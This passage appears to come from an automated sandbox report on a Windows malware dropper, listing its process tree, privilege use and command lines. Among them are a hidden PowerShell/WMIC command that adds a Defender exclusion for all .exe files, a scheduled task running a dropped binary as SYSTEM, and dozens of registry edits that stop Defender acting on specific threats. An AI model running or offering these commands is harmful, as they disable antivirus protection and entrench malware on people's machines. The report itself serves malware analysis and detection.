N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4956 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe
PID 4956 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe
PID 4956 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe
PID 4076 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4076 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4076 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4824 wrote to memory of 4628 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 4628 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 4628 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4628 wrote to memory of 3584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 3584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 3584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 4916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3584 wrote to memory of 4916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3584 wrote to memory of 4916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4076 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4076 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4076 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3092 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3092 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3092 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 4720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 4720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 4720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4720 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4720 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4720 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4348 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4348 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4348 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe

"C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe

.\Install.exe /AdidysikD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe\" Oz /exsite_idTMA 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe Oz /exsite_idTMA 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

